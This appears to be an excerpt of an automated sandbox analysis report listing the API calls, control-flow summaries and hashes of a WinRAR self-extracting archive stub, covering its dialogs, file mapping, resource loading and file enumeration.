25597->25612 25598->25499 25600 1298f4 Concurrency::cancel_current_task 25600->25596 25790 12851f 50 API calls 2 library calls 25600->25790 25604 129a2c 25602->25604 25793 128db3 120 API calls 25602->25793 25603->25598 25603->25600 25617 1298ed 25603->25617 25784 1287fb 41 API calls 25603->25784 25785 12e4a9 97 API calls 25603->25785 25786 12237a 75 API calls 25603->25786 25787 128f28 99 API calls 25603->25787 25606 129ae8 25604->25606 25625 129a8a 25604->25625 25605->25604 25605->25606 25609 12b4c1 3 API calls 25605->25609 25610 129b53 25606->25610 25657 12a14a 25606->25657 25794 12ab1c 25606->25794 25607 12a801 81 API calls 25607->25598 25608 12a801 81 API calls 25608->25598 25614 1299f3 25609->25614 25751 12bf0a 25610->25751 25612->25625 25792 128b7c 124 API calls 25612->25792 25614->25604 25791 12a50a 98 API calls 25614->25791 25616 129ba2 25620 12bf0a 27 API calls 25616->25620 25788 12237a 75 
API calls 25617->25788 25638 129bb8 25620->25638 25625->25607 25626 129b41 25798 127951 78 API calls 25626->25798 25628 129c8b 25629 129ce7 25628->25629 25630 129e85 25628->25630 25633 129cff 25629->25633 25637 129da7 25629->25637 25631 129e97 25630->25631 25632 129eab 25630->25632 25654 129d20 25630->25654 25805 12a475 138 API calls __EH_prolog 25631->25805 25755 134576 25632->25755 25635 129d46 25633->25635 25644 129d0e 25633->25644 25635->25654 25801 12829b 112 API calls 25635->25801 25802 128f6b 39 API calls 25637->25802 25638->25628 25639 129c62 25638->25639 25648 12aa7a 80 API calls 25638->25648 25639->25628 25799 12ac9c 83 API calls 25639->25799 25640 129ec4 25765 13421f 25640->25765 25800 12237a 75 API calls 25644->25800 25646 129e76 25646->25499 25648->25639 25649 129dec 25650 129e08 25649->25650 25651 129e1f 25649->25651 25649->25654 25803 128037 86 API calls 25650->25803 25804 12a212 104 API calls __EH_prolog 25651->25804 25654->25646 25658 129fca 25654->25658 25806 12237a 75 API calls 25654->25806 25656 12a0d5 25656->25657 25659 12b8e6 3 API calls 25656->25659 25657->25608 25658->25656 25658->25657 25660 12a083 25658->25660 25807 12b199 SetEndOfFile 25658->25807 25661 12a130 25659->25661 25774 12b032 25660->25774 25661->25657 25808 12237a 75 API calls 25661->25808 25664 12a0ca 25666 12a880 78 API calls 25664->25666 25666->25656 25667 12a140 25809 127871 77 API calls 25667->25809 25670 121653 25669->25670 25672 121665 Concurrency::cancel_current_task 25669->25672 25670->25672 25892 1216b2 25670->25892 25673 122111 26 API calls 25672->25673 25674 121694 25673->25674 25895 12e339 25674->25895 25678 12b1e9 25677->25678 25679 12b1f3 25678->25679 25904 1277af 79 API calls 25678->25904 25679->25488 25681->25505 25683 12c20d __cftof 25682->25683 25688 12c0d3 25683->25688 25695 12c0b4 25688->25695 25690 12c148 25691 122111 25690->25691 25692 12212b 25691->25692 25693 12211c 25691->25693 25692->25523 25699 12136b 26 API calls Concurrency::cancel_current_task 
25693->25699 25696 12c0c2 25695->25696 25697 12c0bd 25695->25697 25696->25690 25698 122111 26 API calls 25697->25698 25698->25696 25699->25692 25705 121822 25700->25705 25703->25540 25704->25537 25706 1213f2 25705->25706 25707 121834 25705->25707 25706->25542 25708 12185d 25707->25708 25715 1276e9 77 API calls __vswprintf_c_l 25707->25715 25710 14520e 22 API calls 25708->25710 25712 12187a 25710->25712 25711 121853 25716 12775a 76 API calls 25711->25716 25712->25706 25717 12775a 76 API calls 25712->25717 25715->25711 25716->25708 25717->25706 25719 121a8a 25718->25719 25720 121a8e 25718->25720 25719->25547 25722 1219c5 143 API calls 25720->25722 25722->25719 25724 12e3a5 25723->25724 25726 12e3ac 25723->25726 25725 12aa7a 80 API calls 25724->25725 25725->25726 25726->25550 25727->25552 25729 13efa8 25728->25729 25730 12f937 53 API calls 25729->25730 25731 13efcb 25730->25731 25732 124a20 _swprintf 51 API calls 25731->25732 25733 13efdd 25732->25733 25734 13e607 17 API calls 25733->25734 25735 132eba 25734->25735 25735->25499 25736->25565 25737->25565 25738->25562 25740 1266ef 25739->25740 25812 1265fb 25740->25812 25742 12675a 25742->25581 25743 126722 25743->25742 25817 12c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25743->25817 25746 1289dd 25745->25746 25747 128a15 25746->25747 25823 127931 75 API calls 25746->25823 25747->25589 25747->25593 25747->25598 25749 128a0d 25824 121397 75 API calls 25749->25824 25752 12bf18 25751->25752 25754 12bf22 25751->25754 25753 13feae 27 API calls 25752->25753 25753->25754 25754->25616 25756 13458b 25755->25756 25758 134595 ___std_exception_copy 25755->25758 25825 12775a 76 API calls 25756->25825 25759 13461b 25758->25759 25760 1346c5 25758->25760 25761 13463f __cftof 25758->25761 25826 1344a9 76 API calls 3 library calls 25759->25826 25827 143330 RaiseException 25760->25827 25761->25640 25764 1346f1 25766 134251 25765->25766 25767 134228 25765->25767 25768 134245 25766->25768 25842 1366c4 138 API 
calls 2 library calls 25766->25842 25767->25768 25769 134247 25767->25769 25771 13423d 25767->25771 25768->25654 25841 13739e 133 API calls 25769->25841 25828 137dcc 25771->25828 25775 12b043 25774->25775 25777 12b052 25774->25777 25776 12b049 FlushFileBuffers 25775->25776 25775->25777 25776->25777 25778 12b0cf SetFileTime 25777->25778 25778->25664 25779->25572 25780->25585 25781->25579 25782->25586 25783->25603 25784->25603 25785->25603 25786->25603 25787->25603 25788->25600 25789->25600 25790->25596 25791->25604 25792->25625 25793->25604 25795 129b2b 25794->25795 25796 12ab25 GetFileType 25794->25796 25795->25610 25797 12237a 75 API calls 25795->25797 25796->25795 25797->25626 25798->25610 25799->25628 25800->25654 25801->25654 25802->25649 25803->25654 25804->25654 25805->25654 25806->25658 25807->25660 25808->25667 25809->25657 25810->25598 25811->25598 25818 1264f8 25812->25818 25815 12661c 25815->25743 25816 1264f8 2 API calls 25816->25815 25817->25743 25821 126502 25818->25821 25819 1265ea 25819->25815 25819->25816 25821->25819 25822 12c6af CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 25821->25822 25822->25821 25823->25749 25824->25747 25825->25758 25826->25761 25827->25764 25843 13479d 25828->25843 25830 137ddd __InternalCxxFrameHandler 25832 1381ee 25830->25832 25849 12e56c 25830->25849 25858 135001 133 API calls 25830->25858 25859 138243 133 API calls 25830->25859 25860 13229f 89 API calls 25830->25860 25861 1324df 25830->25861 25865 134b0c 99 API calls __InternalCxxFrameHandler 25830->25865 25866 13889f 138 API calls __InternalCxxFrameHandler 25830->25866 25867 1363a9 99 API calls __InternalCxxFrameHandler 25832->25867 25834 1381fe __InternalCxxFrameHandler 25834->25768 25841->25768 25842->25768 25845 1347a7 __cftof __EH_prolog 25843->25845 25844 134892 25844->25830 25845->25844 25846 134829 __cftof ___std_exception_copy 25845->25846 25847 140013 41 API calls 25845->25847 25846->25844 25868 12775a 76 API calls 25846->25868 
25847->25846 25855 12e582 __InternalCxxFrameHandler 25849->25855 25850 12e6f2 25851 12e726 25850->25851 25869 12e523 25850->25869 25873 132121 25851->25873 25855->25850 25856 12e6e9 25855->25856 25879 12bff5 92 API calls __EH_prolog 25855->25879 25880 139c9d 118 API calls 25855->25880 25856->25830 25858->25830 25859->25830 25860->25830 25862 132516 25861->25862 25863 1324eb ResetEvent ReleaseSemaphore 25861->25863 25862->25830 25891 1322fc 80 API calls 25863->25891 25865->25830 25866->25830 25867->25834 25868->25846 25870 12e52b 25869->25870 25871 12e568 25869->25871 25870->25871 25881 132e58 25870->25881 25871->25851 25874 132128 25873->25874 25875 132143 25874->25875 25889 1276e4 RaiseException std::_Xinvalid_argument 25874->25889 25877 132154 SetThreadExecutionState 25875->25877 25890 1276e4 RaiseException std::_Xinvalid_argument 25875->25890 25877->25856 25879->25855 25880->25855 25884 13eead 25881->25884 25885 1315a3 25884->25885 25886 13eec4 SendDlgItemMessageW 25885->25886 25887 13c748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25886->25887 25888 132e78 25887->25888 25888->25871 25889->25875 25890->25877 25891->25862 25901 1220ed 26 API calls Concurrency::cancel_current_task 25892->25901 25894 1216c0 25896 12e34a Concurrency::cancel_current_task 25895->25896 25902 12bd8e 87 API calls Concurrency::cancel_current_task 25896->25902 25898 12e37c 25903 12bd8e 87 API calls Concurrency::cancel_current_task 25898->25903 25900 12e387 25901->25894 25902->25898 25903->25900 25904->25679 25906 12baa1 25905->25906 25907 12bb20 FindNextFileW 25906->25907 25908 12baba FindFirstFileW 25906->25908 25909 12bb2b GetLastError 25907->25909 25915 12bb02 25907->25915 25910 12bac9 25908->25910 25908->25915 25909->25915 25911 12cf32 GetCurrentDirectoryW 25910->25911 25912 12bad9 25911->25912 25913 12baf7 GetLastError 25912->25913 25914 12badd FindFirstFileW 25912->25914 25913->25915 25914->25913 25914->25915 25915->25509 25916->25433 
Call-graph fragment (rendered graph not reproducible as text; only the node addresses with attached API calls are recoverable from the edge list): 132228 ReleaseSemaphore; 132266 DeleteCriticalSection, CloseHandle; 132252 CloseHandle; 12b4e0 and 12b509 GetFileAttributesW; 12cf32 GetCurrentDirectoryW; 13f021 SetDlgItemTextW; 1530f0 CloseHandle; 132efb GetCPInfo, IsDBCSLeadByte; 13ede1 DialogBoxParamW; 14c98c GetOEMCP; 14c9a3 GetACP; 14ce10 IsValidCodePage; 14ce22 and 14ca43 GetCPInfo; 14db58, 14dbfc, 14bb4c and 14bbe0 MultiByteToWideChar; 14dc18 GetStringTypeW; 14bcdf WideCharToMultiByte; 14c18c LCMapStringW; 14bde1 EnterCriticalSection; 14cd8f LeaveCriticalSection; 1410e0 LocalFree; 14d1e0 GetProcessHeap. The remaining nodes are CRT helpers (_free, _abort, __vsnwprintf_l, __cftof, CatchGuardHandler) reached from the code-page and string-conversion routines.

        Control-flow Graph

        APIs
          • Part of subcall function 00131B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00131B95
          • Part of subcall function 00131B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00131BA7
          • Part of subcall function 00131B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00131BD8
          • Part of subcall function 0013B64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0013B655
          • Part of subcall function 0013BD0B: OleInitialize.OLE32(00000000), ref: 0013BD24
          • Part of subcall function 0013BD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0013BD5B
          • Part of subcall function 0013BD0B: SHGetMalloc.SHELL32(0016A460), ref: 0013BD65
        • GetCommandLineW.KERNEL32 ref: 0013F08B
        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0013F0B5
        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0013F0C6
        • UnmapViewOfFile.KERNEL32(00000000), ref: 0013F117
          • Part of subcall function 0013ED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0013ED34
          • Part of subcall function 0013ED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0013ED70
          • Part of subcall function 0013074B: _wcslen.LIBCMT ref: 0013076F
        • CloseHandle.KERNEL32(00000000), ref: 0013F11E
        • GetModuleFileNameW.KERNEL32(00000000,00180CC0,00000800), ref: 0013F138
        • SetEnvironmentVariableW.KERNEL32(sfxname,00180CC0), ref: 0013F144
        • GetLocalTime.KERNEL32(?), ref: 0013F14F
        • _swprintf.LIBCMT ref: 0013F18E
        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0013F1A3
        • GetModuleHandleW.KERNEL32(00000000), ref: 0013F1AA
        • LoadIconW.USER32(00000000,00000064), ref: 0013F1C1
        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 0013F212
        • Sleep.KERNEL32(?), ref: 0013F240
        • DeleteObject.GDI32 ref: 0013F279
        • DeleteObject.GDI32(?), ref: 0013F289
        • CloseHandle.KERNEL32 ref: 0013F2CC
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
        • API String ID: 3014515783-3710569615
        • Opcode ID: 08d0db6798f3989bb0a5cb15aa1996cc0a62b8859f389018a778339ac423e880
        • Instruction ID: 8aa04ac6e645ac6533b48f03c45a3fa9355e4d050056bb1e2076a7b5df3b7be9
        • Opcode Fuzzy Hash: 08d0db6798f3989bb0a5cb15aa1996cc0a62b8859f389018a778339ac423e880
        • Instruction Fuzzy Hash: 1B61F571900300FBD311ABA5EC89F6B3BECEB59745F440029F945A25A2DB74DDC9CB62

        Control-flow Graph

        Control-flow graph of the function at 0013B6C2 (rendered graph not reproducible as text; basic blocks and their calls recovered from the node list): 13b6c2 FindResourceW (type PNG) → 13b6e5 SizeofResource → 13b6fc LoadResource → 13b711 LockResource → 13b722 GlobalAlloc → 13b73d GlobalLock → 13b74c CreateStreamOnHGlobal → 13b76c call 13b626 (GDI+ bitmap from the stream) → 13b79a GdipCreateHBITMAPFromBitmap. Any failure before GlobalAlloc falls through to 13b7db; after it, the exit path is 13b7c5 GlobalUnlock → 13b7cc GlobalFree → 13b7d3.
        APIs
        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0013C91D,00000066), ref: 0013B6D5
        • SizeofResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B6EC
        • LoadResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B703
        • LockResource.KERNEL32(00000000,?,?,?,0013C91D,00000066), ref: 0013B712
        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0013C91D,00000066), ref: 0013B72D
        • GlobalLock.KERNEL32(00000000), ref: 0013B73E
        • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0013B762
        • GlobalUnlock.KERNEL32(00000000), ref: 0013B7C6
          • Part of subcall function 0013B626: GdipAlloc.GDIPLUS(00000010), ref: 0013B62C
        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0013B7A7
        • GlobalFree.KERNEL32(00000000), ref: 0013B7CD
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
        • String ID: PNG
        • API String ID: 211097158-364855578
        • Opcode ID: 2c6aeb0163c295a3cb81f03010abec87e21fbeb83ac9d437a2d854a9a9c3e981
        • Instruction ID: d2d14a67873e4c748de89aa95abb2935521e8c50062d549c668e9bc6809aa9e3
        • Opcode Fuzzy Hash: 2c6aeb0163c295a3cb81f03010abec87e21fbeb83ac9d437a2d854a9a9c3e981
        • Instruction Fuzzy Hash: 88318171608712EBD7109F61ECC8D1B7FA8EF85796F050518FA05C6A60EB31D8C4CBA0

        Control-flow Graph

        Control-flow graph of the function at 0012BA94 (rendered graph not reproducible as text): 12ba94 call 13ffc0 → either 12bb20 FindNextFileW (an open search handle) or 12baba FindFirstFileW. If that FindFirstFileW fails, 12bac9 call 12cf32 builds an alternative path and 12badd retries FindFirstFileW. Failures go through 12baf7 or 12bb2b GetLastError to 12bb12; success continues at 12bb3b (call 131928, call 12d71d, call 132914 x3) and returns at 12bbfd.
        APIs
        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BABD
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAEB
        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BAF7
        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BB21
        • GetLastError.KERNEL32(?,?,?,?,0012B98B,000000FF,?,?), ref: 0012BB2D
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: FileFind$ErrorFirstLast$Next_wcslen
        • String ID:
        • API String ID: 42610566-0
        • Opcode ID: da56306a4290eaa0203fa62c2fe108046d8d89d4bbf4cb07a3c5ee5c2f875652
        • Instruction ID: b3764e0373ab054055b012a212a6f9d0dfbd5f2217b47f9fca37a0aee2169bf1
        • Opcode Fuzzy Hash: da56306a4290eaa0203fa62c2fe108046d8d89d4bbf4cb07a3c5ee5c2f875652
        • Instruction Fuzzy Hash: B8415F72901529ABCB25DF64DCC4AE9B3B8FB48350F10019AF96DE3240D734AE94CF90
        APIs
        • __EH_prolog.LIBCMT ref: 001292CB
          • Part of subcall function 0012D656: _wcsrchr.LIBVCRUNTIME ref: 0012D660
          • Part of subcall function 0012CAA0: _wcslen.LIBCMT ref: 0012CAA6
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B5E2
          • Part of subcall function 0012B5D6: __aulldiv.LIBCMT ref: 0012B60E
          • Part of subcall function 0012B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0012B615
          • Part of subcall function 0012B5D6: _swprintf.LIBCMT ref: 0012B640
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B64A
          • Part of subcall function 0012B5D6: _swprintf.LIBCMT ref: 0012B6A0
          • Part of subcall function 0012B5D6: _wcslen.LIBCMT ref: 0012B6AA
          • Part of subcall function 00124727: __EH_prolog.LIBCMT ref: 0012472C
          • Part of subcall function 0012A212: __EH_prolog.LIBCMT ref: 0012A217
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Strings
        • __tmp_reference_source_, xrefs: 00129596
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
        • String ID: __tmp_reference_source_
        • API String ID: 70197177-685763994
        • Opcode ID: 675947e17a31bb1bbdeedfc272cc7cdc55f960c780febd645c36a6a7ae2679a8
        • Instruction ID: 328939162b86135246bb5b1f1b99930cac2554098dc398a223920ca8167e6583
        • Opcode Fuzzy Hash: 675947e17a31bb1bbdeedfc272cc7cdc55f960c780febd645c36a6a7ae2679a8
        • Instruction Fuzzy Hash: 7AA26F71904265AFDF19DF78D895BFE7BB4BF15300F0801B9E8499B182D73059A8CB61
        APIs
        • GetCurrentProcess.KERNEL32(00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002,00000000), ref: 001491C1
        • TerminateProcess.KERNEL32(00000000,?,00149176,00000000,0015D570,0000000C,001492CD,00000000,00000002,00000000), ref: 001491C8
        • ExitProcess.KERNEL32 ref: 001491DA
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: Process$CurrentExitTerminate
        • String ID:
        • API String ID: 1703294689-0
        • Opcode ID: 03bf6896b93a902440fc622a6fbe5a85ba21a09aedad5175f9f02e3c5443f155
        • Instruction ID: a8dc8a156c20f92f5262c125143ba0b86f8e4ea4913ecea3f7283ea61ad97d20
        • Opcode Fuzzy Hash: 03bf6896b93a902440fc622a6fbe5a85ba21a09aedad5175f9f02e3c5443f155
        • Instruction Fuzzy Hash: 6FE04636000648EFCF116F60DD4CE893B7AEB50756B004014F9088B531CB75EDC2CA80
        APIs
        • CLSIDFromString.COMBASE(?,?), ref: 0013B0CF
        • CoCreateInstance.COMBASE(?,00000000,00000005,001564FC,?), ref: 0013B0E6
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: CreateFromInstanceString
        • String ID:
        • API String ID: 432265043-0
        • Opcode ID: a27f015ce75b7a6b2ed34306a42e826d93e22fe2e1a207fe1aa3a09b8ab52a65
        • Instruction ID: 72acfdf02822ed6a098c132989612d12ca74787e698187abad07e6d077387b51
        • Opcode Fuzzy Hash: a27f015ce75b7a6b2ed34306a42e826d93e22fe2e1a207fe1aa3a09b8ab52a65
        • Instruction Fuzzy Hash: 9A212A35600214EFDB04DF68DC9999E7BB9EF48745B000059FA06EB260DB71BD82CF90
        APIs
        • SetWindowLongW.USER32(?,000000EB), ref: 0013B098
        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0013B0B3
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: Window$LongNtdllProc_
        • String ID:
        • API String ID: 2044268144-0
        • Opcode ID: 0f79bc80b68d8648d19f88a995e03d5cbeb345d4410b3d785d6ffe3c7605cb77
        • Instruction ID: e455445a9ed40b39d6f415a8e29a3acbd84c91bd636fefb1f842a610b525fb52
        • Opcode Fuzzy Hash: 0f79bc80b68d8648d19f88a995e03d5cbeb345d4410b3d785d6ffe3c7605cb77
        • Instruction Fuzzy Hash: D9E0E536100118BBCF119F99DD48C8E3F6AEF89760B008111FA1956160D771AA61EBA0
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 8b981b9c287e186ec1f9fdb2a536e30a4aa236d49e6aff94c275b69c7c577a2a
        • Instruction ID: a8f060f2194cdd7ccbab6dd32c541e7126e24cb3a2c50c462d4a823d52d30a6f
        • Opcode Fuzzy Hash: 8b981b9c287e186ec1f9fdb2a536e30a4aa236d49e6aff94c275b69c7c577a2a
        • Instruction Fuzzy Hash: CBD1A3B1A083458FDB24DF28C88075BBBE5BF99308F04456DF8999B282D734E949CB56
        APIs
        • __EH_prolog.LIBCMT ref: 0013C9C5
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013CAB1
        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013CACF
        • IsDialogMessageW.USER32(?,?), ref: 0013CAE2
        • TranslateMessage.USER32(?), ref: 0013CAF0
        • DispatchMessageW.USER32(?), ref: 0013CAFA
        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0013CB1D
        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0013CB40
        • GetDlgItem.USER32(?,00000068), ref: 0013CB63
        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0013CB7E
        • SendMessageW.USER32(00000000,000000C2,00000000,001545F4), ref: 0013CB91
          • Part of subcall function 0013E586: _wcslen.LIBCMT ref: 0013E5B0
        • SetFocus.USER32(00000000), ref: 0013CB98
        • _swprintf.LIBCMT ref: 0013CBF7
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0013CC5A
        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0013CC82
        • GetTickCount.KERNEL32 ref: 0013CCA0
        • _swprintf.LIBCMT ref: 0013CCB8
        • GetLastError.KERNEL32(?,00000011), ref: 0013CCEA
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0013CD3D
        • _swprintf.LIBCMT ref: 0013CD74
        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0013CDC8
        • GetCommandLineW.KERNEL32 ref: 0013CDDE
        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00171482,00000400,00000001,00000001), ref: 0013CE35
        • Sleep.KERNEL32(00000064), ref: 0013CEA5
        • UnmapViewOfFile.KERNEL32(?,?,0000421C,00171482,00000400), ref: 0013CECE
        • CloseHandle.KERNEL32(00000000), ref: 0013CED7
        • _swprintf.LIBCMT ref: 0013CF0A
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013CF69
        • SetDlgItemTextW.USER32(?,00000065,001545F4), ref: 0013CF80
        • GetDlgItem.USER32(?,00000065), ref: 0013CF89
        • GetWindowLongW.USER32(00000000,000000F0), ref: 0013CF98
        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0013CFA7
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D054
        • _wcslen.LIBCMT ref: 0013D0AA
        • _swprintf.LIBCMT ref: 0013D0D4
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0013D11E
        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0013D138
        • GetDlgItem.USER32(?,00000068), ref: 0013D141
        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0013D157
        • GetDlgItem.USER32(?,00000066), ref: 0013D171
        • SetWindowTextW.USER32(00000000,0017389A), ref: 0013D193
        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0013D1F3
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D206
        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7A0,00000000,?), ref: 0013D2A9
        • EnableWindow.USER32(00000000,00000000), ref: 0013D383
        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0013D3C5
          • Part of subcall function 0013D872: __EH_prolog.LIBCMT ref: 0013D877
        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0013D3E9
        Memory Dump Source and IDA snapshot: as listed for the first function above.
        Similarity
        • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableFocusHandleLineMappingModuleNameParamParentSleepTickTranslateUnmapUser__vswprintf_c_l
        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
        • API String ID: 3593385084-1645151803
        • Opcode ID: 38c194801d9e1aae944164428b4e81ebf4323d8fa0fe86a186e517b19128f786
        • Instruction ID: 2c3b54196073505bd32cf8f13c07b9b21a47e899e73a144a23ee61989bc3adf8
        • Opcode Fuzzy Hash: 38c194801d9e1aae944164428b4e81ebf4323d8fa0fe86a186e517b19128f786
        • Instruction Fuzzy Hash: E042F5B1944314BAEB21AB60FC4AFBE7BBCAB11704F440155F645B64D2CBB44E85CB62

        Control-flow Graph

        Control-flow graph of the function at 00131B7C (rendered graph not reproducible as text): 131b7c call 13ffc0, GetModuleHandleW (kernel32) → 131ba1 GetProcAddress (SetDllDirectoryW) → 131bd2 GetProcAddress (SetDefaultDllDirectories) → 131c00 → 131e67 call 1489de → 131e78 GetModuleFileNameW, CreateFileW (own image) → 131ea8 SetFilePointer → 131eb6 ReadFile → 131f16 call 131697 → 131f21 CloseHandle → 131f2d GetModuleFileNameW, call 12d6a7, call 131928 → 131f5b call 12c619 → 131f69 call 131b34 → 131f76 CompareStringW → 131f96 call 12d71d, GetFileAttributesW → 131fd2 call 12d71d, GetFileAttributesW → 132005. From there either 132114 (normal return) or 13200d call 12d6f1, call 12c619, then 132026 (call 131b34 x2, call 12f937, call 124a20, call 12f937, call 13b7e4: message box path) or 13208c call 124a20, AllocConsole → 1320c1 GetCurrentProcessId, AttachConsole, call 144f93, GetStdHandle, WriteConsoleW, Sleep, FreeConsole; both end at 13210c ExitProcess.
        APIs
        • GetModuleHandleW.KERNEL32(kernel32), ref: 00131B95
        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00131BA7
        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00131BD8
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00131E82
        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00131E9C
        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00131EAC
        • ReadFile.KERNEL32(00000000,?,00007FFE,00154D24,00000000), ref: 00131ECA
        • CloseHandle.KERNEL32(00000000), ref: 00131F22
        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00131F37
        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00154D24,?,00000000,?,00000800), ref: 00131F8B
        • GetFileAttributesW.KERNEL32(?,?,00154D24,00000800,?,00000000,?,00000800), ref: 00131FB5
